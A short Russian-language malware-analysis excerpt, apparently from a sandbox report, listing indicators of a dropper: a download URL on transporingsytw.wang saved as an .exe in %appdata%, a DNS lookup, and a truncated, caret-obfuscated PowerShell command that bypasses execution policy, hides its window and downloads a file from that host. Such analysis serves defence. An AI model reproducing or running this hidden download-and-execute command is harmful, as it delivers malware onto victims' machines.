Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOWErSHe^L^l.^exE ^-eXeC^UtionP^oLIcy ^byPas^S -^No^p^ROfile^ -WinDo^wstyl^e h^i^dde^n (n^eW-OBJ^E^c^t^ SyS^T^E^m^.n^Et^.wE^BcLIEnT^)^.^do^wnlo^AdfILe^('http://transporingsytw.w...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /C "pOWErSHe^L^l.^exE ^-eXeC^UtionP^oLIcy ^byPas^S -^No^p^ROfile^ -WinDo^wstyl^e h^i^dde^n (n^eW-OBJ^E^c^t^ SyS^T^E^m^.n^Et^.wE^BcLIEnT^)^.^do^wnlo^AdfILe^('http://transporingsytw.w...' (со скрытым окном)